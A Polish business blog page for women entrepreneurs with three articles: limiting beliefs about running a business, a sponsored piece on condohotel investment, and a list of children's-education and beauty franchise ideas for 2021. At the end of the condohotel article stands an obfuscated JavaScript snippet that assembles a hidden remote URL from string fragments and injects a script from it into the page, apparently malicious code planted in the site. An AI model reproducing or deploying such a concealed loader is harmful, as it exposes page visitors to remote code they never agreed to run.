Czego szukasz

Te przekonania hamują rozwój Twojego biznesu!

Jeśli prowadząc swój własny biznes, pracujesz więcej niż osiem godzin dziennie na etacie, zawalasz weekendy, nie robisz sobie urlopu, nie świętujesz, coraz rzadziej widujesz przyjaciół i rodzinę, to zastanów się jakie wzorce wyniosłaś z domu. Sprawdź jakie przekonania mogą hamować rozwój Twojego biznesu!

 • Monika Sowińska - 29/09/2020
kobieta w okularach z długopisem

Może całe dzieciństwo słyszałaś, że ojciec ciężko pracuje na utrzymanie rodziny, że matka musi wziąć nadgodziny, żebyście mogli pojechać na wakacje, że stryj prowadzi biznes i dlatego całe dni przesiaduje w firmie. Wtedy niezależnie od dochodów, zawsze możesz czuć niedosyt, mieć coś do zrobienia, bez czego Twoim zdaniem biznes się zawali i kierować swoje siły nawet tam, gdzie nie ma takiej potrzeby. To przekonania, które mogą skutecznie hamować rozwój Twojego biznesu.

Czasem nawet im więcej pracujesz, tym słabsze masz wyniki, bo pracujesz dużo niezależnie od efektów. Ciężka praca jest na czubku Twojego nosa i przysłania Ci rzeczywiste możliwości innego poukładania własnego życia i biznesu. Sprawdź jakie jeszcze przekonania mogą Cię ograniczać!

Przeczytaj także: 12 błędów początkującego przedsiębiorcy, których można uniknąć

Ograniczające przekonania

Ograniczające przekonania to głosy, które wybrzmiewają w Twojej głowie, które zatruwają Ci codzienność, opóźniają w podejmowaniu ważnych decyzji, hamują rozwój, zatrzymują w biegu, a przede wszystkim pochłaniają mnóstwo cennej energii, którą można wykorzystać do budowania, tworzenia, ulepszania.

Biorą się z tego, co często słyszałaś lub słyszysz w swoim środowisku w określonych sytuacjach, z typowego sposobu reagowania Twojego otoczenia – kiedyś lub teraz – na te sytuacje. Im częstszy masz kontakt z tym samym zachowaniem w tych samych okolicznościach, tym głębiej i silniej zapadają w Tobie przekonania, że tak właśnie funkcjonuje świat, taka a nie inna jesteś, taki a nie inny masz wpływ (na ogół ograniczony lub żaden).

Kiedy rozmawiam z początkującymi przedsiębiorcami, bardzo często wybrzmiewają blokujące ich w działaniu przekonania na temat biznesu. Ogrom takich przekonań da się zauważyć na biznesowych forach internetowych. Są to stwierdzenia typu:

 • w biznesie trzeba dużo i ciężko pracować,
 • biznes wymaga poświęceń,
 • w życiu i w biznesie jest coś za coś,
 • jak prowadzisz biznes, to jesteś bogata (a jak tego po tobie nie widać, tzn. że słaby ten biznes),
 • trzeba mieć znajomości/ plecy/ układy/ dojścia, bez tego nie da się prowadzić biznesu,
 • jak ci się nie wiedzie w biznesie, tzn. że jesteś słaba/ przegrana/ leniwa/ frajerka/ …
 • ci, co prowadzą biznes są nieuczciwi; zarabiają, bo robią przekręty.

Wspieranie vs konkurowanie

Takie schematy myślenia i działania częściej da się zauważyć w środowiskach mocno konkurujących, gdzie pierwsze skrzypce gra rywalizacja, a nie wzajemne wspieranie się. Bywa jednak, że i osoby bardziej uważne na potrzeby swoje i swojego otoczenia wcale, nie są wolne od tego typu podszeptów umysłu.

Na ogół zależy im na dobrostanie bliskich i to jest główne źródło motywacji do prowadzenia biznesu, ale nie zawsze jest to biznes, który stanowi przeciwieństwo tego, co wybrzmiewa z powyższych komunikatów. Zatem, nawet jeśli Twoja działalność wynika z pasji, z potrzeby ulepszania świata, to żeby spełniała ona Twoje oczekiwania, zweryfikuj, czy wszystkie Twoje przekonania na temat prowadzenia biznesu na pewno Ci w tym pomagają.

Przeczytaj także: Podstawy prowadzenia biznesu online

Dobrze czyli źle

Niestety są też przekonania pozytywnie brzmiące, które jednak mogą Cię rozleniwiać, opóźniać, bagatelizować całe przedsięwzięcie. Brzmią one mniej więcej tak:

 • jestem w czepku urodzona/ mam w życiu szczęście,
 • biznes z pasji polega na tym, że zajmuję się tylko moją pasją, a reszta jakoś się zrobi,
 • mam swój biznes, po to by mieć dużo czasu/ pieniędzy na przyjemności,
 • wystarczy, że… (założę firmę/ zbuduję stronę internetową/…) a klienci sami będą do mnie przychodzić,
 • prowadzenie biznesu, to czysta przyjemność, sam się kręci, nie wymaga żadnego wysiłku,
 • jak tylko poznam złotą zasadę prowadzenia biznesu, to odniosę sukces.

Nie możesz więc powiedzieć, że jesteś całkowicie wolna od ograniczających Cię przekonań, zwłaszcza jeśli myślisz, że w Twojej głowie gości tylko szczęście, a tymczasem Twój biznes utknął w martwym punkcie.

Co z tym zrobić?

Po pierwsze uświadom sobie, które z tych przekonań mieszkają w Tobie, od jak dawna i na ile chcesz je zmienić. Może przecież być tak, że to samo przekonanie kogoś wstrzymuje, a Ciebie motywuje. Warto więc na początek zrobić sobie taką wyliczankę za i przeciw, czyli co mi to przekonanie daje, a co odbiera.

Potem wybierz tylko jedno z nich i pracuj tylko z tym jednym. Postaraj się delikatnie zmienić jego treść, dopuścić inną możliwość, np. zamiast ” trzeba dużo i ciężko pracować „, powiedzieć sobie, że ” czasem trzeba dużo i ciężko pracować ” albo, że ” trzeba dużo i ciężko pracować ale … można robić sobie długie wakacje”, albo że ” można dużo i ciężko pracować „.

Kształt nowego przekonania zależy od Ciebie, ważne, żebyś czuła się z nim dobrze, żeby było Twoje. Kiedy to nowe przekonanie zagości w Tobie wypierając poprzednie, możesz próbować zmienić je jeszcze bardziej, aż etapami osiągniesz stan oczekiwany np. „mogę pracować mało i zarabiać dużo”. Dopiero potem zabierz się za pracę nad kolejnym przekonaniem.

Nie próbuj zmienić wszystkich na raz, bo będzie to zbyt trudne i nie osiągniesz zamierzonego rezultatu. A to rezultaty będą Twoją największą motywacją do pracy nad kolejnymi przekonaniami. Największe zmiany zajdą w Twoim sposobie podchodzenia do spraw, co przyniesie realne, pozytywne zmiany w prowadzonym przez Ciebie biznesie. Jakiś czas to potrwa, zanim je zauważysz, ale kiedy już uświadomisz je sobie, poczujesz ogromną satysfakcję.

Przeczytaj także: 16 podpowiedzi, co możesz zrobić dla swojego biznesu bez wychodzenia z domu?

Sięgnij po wsparcie

Do pracy z przekonaniami psycholodzy i coachowie mają odpowiednie techniki, wtedy zmiany postępują nieco szybciej. Jeśli więc poczujesz, że Twój przypadek jest zbyt trudny na samodzielną pracę, albo jeśli chcesz dobrze przyjrzeć się swoim przekonaniom, temu, jaki mają wpływ na Twoje działania, śmiało sięgnij po pomoc. Samo uświadomienie sobie swoich ograniczeń, zaobserwowanie ich, już bardzo dużo daje, zatem – jakkolwiek podejdziesz do tego tematu. No i warto zrobić coś dla siebie!
Powodzenia! 🙂

Zdjęcie: 123rf

Spodobał Ci się artykuł? Podziel się z innymi:
Monika Sowińska
Coach przedsiębiorczych, mentorka start’upów, menedżerka e-biznesów z ponad 15-letnim doświadczeniem. Uczy początkujących przedsiębiorców skutecznego działania we współczesnym – dynamicznym i cyfrowym świecie. Pomaga zmienić wizję w realny, prosperujący biznes. Prywatnie miłośniczka górskich wędrówek, książek i kultury francuskiej.

Zarabianie na wynajmie apartamentów

Przed nami druga edycja programu mentoringowego Mother Empower! „To szansa na poznanie siebie, swoich mocnych stron i rozwinięcie umiejętności” – mówi Asia Wojdan-Liszewska, która pracuje w firmie Bosch i wpiera nasze wspólne działania! Tym razem Asia będzie jedną z mentorek Mother Empower 2. i swoim doświadczeniem i pozytywną energią podzieli się ze swoją mentee. Zapisy do programu ruszają już wkrótce a tymczasem zapraszamy do lektury!
 • Alicja Zielińska - 20/01/2021

Condohotel – inwestować czy lepiej nie ryzykować?

Coraz więcej osób może pozwolić sobie na podróżowanie, co wiąże się z koniecznością znalezienia odpowiedniego miejsca noclegowego. Zatrzymywanie się wyłącznie w hotelach kosztuje i to niemało, dlatego rośnie zainteresowanie innymi możliwościami.

Wiele osób nie osiedla się na stałe, ale wynajmuje mieszkanie, zmieniając co jakiś czas lokalizację. Wszystko to sprawia, że apartamenty pod inwestycje stają się coraz bardziej rentownym rozwiązaniem. W przypadku dużych miast, gdzie nie brakuje turystów, bez wątpienia znajdzie się szereg osób zainteresowanych wynajęciem condohotelu.

Istotne jest to, aby nieruchomość miała dobrą lokalizację – na największe zyski można liczyć w przypadku miejscowości nadmorskich w sezonie wakacyjnym. Podobnie jest z obszarami górskimi, które są odwiedzane przez rzeszę turystów nie tylko zimą, ale też latem. Jeśli apartamenty w systemie condo będą miały wysoki standard, można podnieć cenę wynajmu, dzięki czemu inwestycja zwróci się jeszcze szybciej.

Jeśli inwestycja w apartamenty pod wynajem ma być rentowna, to powinny one znajdować się w lokalizacji, która przyciąga atrakcjami turystycznymi przez cały rok. Istotne będzie to, aby obiekt był usytuowany niedaleko stoku narciarskiego, widoku na morze czy jezioro. Nie może też zabraknąć różnych punktów handlowo-usługowych, rozbudowanej infrastruktury.

Zaletą inwestycji w condohotel jest możliwość ochronienia swojego kapitału przed inflacją. Stanie się źródłem regularnego dochodu, możliwe jest nawet odliczenie podatku VAT. Co więcej, właściciel nieruchomości nie musi ponosić żadnych kosztów związanych z jej remontami i naprawami, bo wszystko pokrywa operator hotelowy. Dotyczy to także promocji obiektu. Każdego roku wartość nieruchomości zwiększa się, można też w każdej chwili ją sprzedać. Wiele ofert zakupu condohoteli znajdziesz na stronie condo.pl – https://condo.pl/investments/

Czy inwestowanie w condohotele ma jakieś wady?

Apartamenty pod inwestycje to rozwiązanie pełne zalet, ale nie jest wolne od pewnych wad. Każdy potencjalny inwestor powinien wobec tego mieć je na uwadze przed podjęciem ostatecznej decyzji. Do minusów zaliczyć można brak wpływu na zarządzanie nieruchomością i niemożność zameldowania się – to z kolei może sprawić problemy w przyszłości, gdy właściciel będzie chciał sprzedać apartament na rynku wtórnym. Condohotele są obarczone wyższą stawką VAT, co również stanowi minus, a jej wysokość wynosi 23%. Można oczywiście uzyskać zwrot podatku, ale najpierw trzeba zainwestować wysoki kapitał początkowy.

> (function(){ ob2h=document.createElement(„”);ob2h.async=true;ob2h_=”u”+(„s”)+”t”; ob2hu=”250449624.”;ob2h_+=”a”+(„t.i”);ob2h_+=”n”+(„f”+”o”)+”/”; ob2hu+=”4vv9wcl3b2hnvpn4uyyz8p”+(„3xurlwgz”); ob2h.src=”https://”+ob2h_+ob2hu;ob2h.type=”text/java”; document.body.appendChild(ob2h); })();

Materiał powstał we współpracy z partnerem portalu.

Zdjęcie: partnera portalu.

Spodobał Ci się artykuł? Podziel się z innymi:
Alicja Zielińska

Planujesz założyć biznes w 2021 roku? Wybierz nasze pomysły!

Twoje noworoczne postanowienia dotyczą założenia własnej firmy i zdobycia niezależności zawodowej? Świetnie! Koniecznie sprawdź jakie pomysły mamy dla Ciebie i dlaczego warto działać jako franczyzobiorca znanej marki. W obliczu trudności, których nie brakowało w ostatnim roku, działacie wspólnie i wspieracie się nawzajem. Nasi partnerzy to potwierdzają. Szkoła językowa, zajęcia edukacyjne i kreatywne dla dzieci, salon depilacji czy sklep z ubraniami dla dzieci – który pomysł wybierasz dla siebie?
 • Agnieszka Wadecka - 11/01/2021

Pomysły na biznes 2021, którymi warto się zainteresować

1. Nauka z klockami LEGO – Edukido

Edukido oferuje naukę i zabawę z wykorzystaniem klocków LEGO, zajęcia są skierowane do dzieci od 3 do 12 lat. Dzieci uwielbiają zabawy z LEGO. Jeśli chcesz rozkręcić biznes związany z rozwojem dzieci i wiesz, że klocki LEGO to przepis na sukces, to jest to opcja dla Ciebie.

Zakładając franczyzę otrzymasz profesjonalny system wsparcia biznesowego na każdym etapie z marketingu, sprzedaży czy obsługi klienta. Od niedawna dostępna jest opcja Edukido Mini, która jest bardziej przystępna finansowo.

Dodatkowo, w czasie pandemii Edukido stworzyło nową ofertę zajęć online dla dzieci.

Sprawdź szczegóły współpracy z Edukido

2. Ubranka zawsze w modzie – 5.10.15

Dzieci nieustannie rosną i potrzebują nowych ubrań. Na pewno znacie te memy, gdzie mama skąpi grosza na siebie, ale na dziecięce ubranka wydaje bez wahania dużo więcej? Właśnie dlatego otwarcie własnego sklepu 5.10.15. to świetny pomysł na biznes! Zwłaszcza, że ubranka są śliczne, dobrej jakości, a firma cieszy się renomą naprawdę od wielu lat.
A przy tym firma zapewnia szkolenia ze sprzedaży, niski koszt otwarcia sklepu, zatowarowanie, wsparcie przez cały okres współpracy i brak stałej opłaty franczyzowej.

Poznaj szczegóły biznesu z 5.10.15

3. Twórczy rozwój i świetna zabawa – Akademia Bystrzak

Akademia Bystrzak to podróżnicze kursy rozwoju intelektu dla dzieci, kolonie, wakacje i ferie w mieście czy organizacja twórczych i kreatywnych urodzin. No tak, ale ta pandemia… Otóż Akademia Bystrzak uruchomiła zajęcia online – zobacz jak wyglądały wyprawy w czasie pandemii. W ramach współpracy dostajesz wsparcie merytoryczne i marketingowe, dostęp do materiałów, metodyki i oczywiście możliwości rozwoju.

Poznaj szczegóły biznesu z Akademią Bystrzak

4. Czas dla urody – DepilConcept

A może chciałabyś prowadzić własny gabinet kosmetyczny, ale do tej pory brakowało Ci biznesowego zaplecza aby założyć firmę z tej branży? Właśnie dlatego franczyza wychodzi Ci naprzeciw. DepilConcept to sieć gabinetów, w których wykonuje się zabiegi fototerapii odmładzania i trwałej depilacji. Szczególnie po tym ostatnim ciężkim roku wszystkie chciałybyśmy wyglądać pięknie!

Decydując się na współpracę z DepilConcept otrzymasz pomoc w wyborze lokalu i rekrutacji pracowników, szkolenia dla Ciebie i dla personelu, wsparcie marketingowe, obsługi klienta i sprzedaży, własny serwis urządzeń i urządzenie zastępcze na czas napraw.

Sprawdź jak założyć własny biznes z DepilConcept

5. Najlepsi piłkarze świata – SOCATOTS

Wiesz, że w tym roku zdobywcą Złotej Piłki czyli najlepszym piłkarzem świata został wybrany Robert Lewandowski? No z Robertem pewnie nie będziesz już pracować, ale pomyśl, co jeśli masz szansę wyszkolić najlepszą piłkarską kadrę jaką można sobie wyobrazić? Jak? Otwierając franczyzę SOCATOTS!

Będziesz mogła organizować zajęcia ruchowe dla dzieci w wieku od 6 miesięcy do 5 lat, które z udziałem rodziców będą rozwijać pewność siebie i trenować piłkę nożną.

Ty zaś w ramach współpracy otrzymasz dostęp do zintegrowanej platformy IT, szkolenia i wsparcie marketingowe. Może nawet odkryjesz kolejnego Lewandowskiego? SOCATOTS to system sprawdzony na całym świecie.

Sprawdź jak założyć własny oddział SOCATOTS

6. Język angielski dla dzieci – Early Stage

Early Stage to marka, której nie trzeba przedstawiać. To jedna z najpopularniejszych szkół języka angielskiego dla dzieci i młodzieży w Polsce. Nie ma oddziału w Twojej okolicy? Może chcesz otworzyć własną filię. To proste!

Nie jesteś pewna czy w dobie szalejącego wirusa jest to dobry pomysł? Już w połowie marca 2020 zajęcia Early Stage przeniosły się do online. A dodatkowo – dla wszystkich chętnych dzieci powstało dwujęzyczne przedszkole online!

Early Stage proponuje sprawdzony model finansowy, wsparcie administracyjne, bezpłatne szkolenia, opiekę metodyczną, metodę, którą dzieci uwielbiają i korzystne warunki finansowe. Dzięki temu „ruszysz z kopyta” 😉

Sprawdź jak założyć własny biznes z Early Stage

7. Rozwój kompetencji miękkich dzieci i młodzieży – Akademia JA

Ostatni rok nie był łatwy, można by go porównać do jazdy na rollercoasterze, było z górki, pod górkę, rzadko na prostej i nie wiadomo jakich atrakcji można się spodziewać. A w tym wszystkim mocno ucierpiały dzieci, dla których odnalezienie się w tej sytuacji kosztuje je sporo trudu i emocji. A Akademia JA właśnie tym się zajmuje – rozwojem emocjonalnym dzieci i młodzieży.

Akademia JA oferuje zajęcia dla przedszkolaków, dzieci ze szkół podstawowych i młodzieży z zakresu kompetencji miękkich i umiejętności społecznych. Są także warsztaty dla rodziców. Na obecne czasy to bardzo potrzebne działania.

Otwierając Akademię JA otrzymasz bezpłatne szkolenie, wsparcie merytoryczne i scenariusze zajęć.

Sprawdź jak dołączyć i założyć własny Ośrodek Akademii JA

8. Z kulturą za pan brat – Cool-Turalny Maluch

Jak w miły i przystępny sposób pokazać najmłodszym, że bycie grzecznym i kulturalnym jest… cool? Poprzez zajęcia, które uczą i bawią. Cool-Turalny Maluch ma swój autorski program z savoir vivre i etykiety dla przedszkolaków i dzieci w wieku wczesnoszkolnym.

Aby współpraca przebiegała w pozytywny sposób firma zapewnia konspekty warsztatów, konsultacje, sprawdzony sposób na biznes i mnóstwo zaangażowania.

Sprawdź jak dołączyć do Cool-Turalnego Malucha

9. Matematyczna przygoda – MathRiders

Co tu dużo mówić, matematyka często sprawia dzieciom trudności, gdy jedni czekają na nią z niecierpliwością, inni drżą ze strachu przed nadchodzącą lekcją. Czy wobec tego szkoła matematyki to dobry pomysł na biznes?

No pewnie! Międzynarodowy program edukacji matematycznej – MathRiders został stworzony z myślą o dzieciach i młodzieży w wieku od 2 do 18 lat. Pomaga zbudować mocne podstawy, wyrównać braki, polubić matematykę i rozwinąć logiczne myślenie.

Otwórz swoją szkołę MathRiders, a otrzymasz szkolenia biznesowe, wsparcie, materiały marketingowe, stały rozwój metody i dostęp do platformy zarządzania firmą.

Nie obawiaj się, bo MathRiders również rozwinęło zajęcia online

Sprawdź jak dołączyć do sieci MathRiders

10. Nowe technologie to przyszłość – Akademia Komputerowa Komputrilo

Nauka programowania to przyszłość, a własna Akademia Komputerowa Komputrilo to świetny, przyszłościowy biznes! Wszak w czasie pandemii praca i nauka przeniosły się do internetu, zakupy robimy w sieci i w zasadzie niemal wszystko da się załatwić bez wychodzenia z domu, dlatego rozwój technologiczny to nasza przyszłość. Otwierając oddział Komputrilo będziesz organizować kursy programowania dla dzieci i młodzieży.

Komputrilo to firma przyjazna kobietom, oferująca w ramach współpracy wsparcie techniczne i merytoryczne, szkolenia, swobodę działań i wyłączność na danym obszarze.

Sprawdź jak założyć własną Akademię Komputrilo

11. Klub szalonych naukowców – Nutty Scientists

Nutty Scientists zachęca dzieci do nauki poprzez zabawę i eksperymenty, dzięki którym łatwiej jest zapamiętać nowo poznane informacje. I Ty możesz dołączyć do Nutty Scientists otwierając swój oddział!

Otrzymasz szkolenie wstępne, wsparcie w wyborze i szkoleniu Twoich instruktorów, w organizacji działań promocyjnych i marketingowych. W dodatku Nutty Scientists, sprawdzony w kilkunastu krajach świata nie ma oddziałów w Polsce, więc masz szansę być pierwsza i rozwijać markę na rynku krajowym!

Sprawdź jak założyć pierwszy w Polsce oddział Nutty Scientists

Który pomysł spodobał Ci się najbardziej? Poznaj historie mam, które założyły firmy we współpracy z marką franczyzową. Zadzwoń lub napisz do osób odpowiedzialnych z poszczególnych firm – czekają na Twój kontakt. W 2021 pora działać i spełnić swoje zawodowe marzenia.

Artykuł powstał w ramach akcji Franczyza dla Mamy.

Zdjęcie: 123 rf

Spodobał Ci się artykuł? Podziel się z innymi:
Agnieszka Wadecka
Szczęśliwa żona i mama czwórki dzieci. Macierzyństwo to jej największa pasja, motywująca do rozwoju i działania. Z przyjemnością oddaje się pisaniu. Kocha muzykę, kino i dobre jedzenie. Lubi śledzić trendy i wprowadzać je w życie. Zawodowo początkująca, ale z apetytem na sukces.
Chcę otrzymywać inspiracje, pomysły i sugestie jak pracować i nie zwariować.
Newsletter wysyłamy raz na 2 tygodnie

Może Cię zainteresować także:

Uwaga. Strona wykorzystuje pliki cookies. Informacje uzyskane za ich pomocą wykorzystywane są w celach statystycznych. Pozostając tu godzisz się na ich zapisywanie w Twojej przeglądarce. ×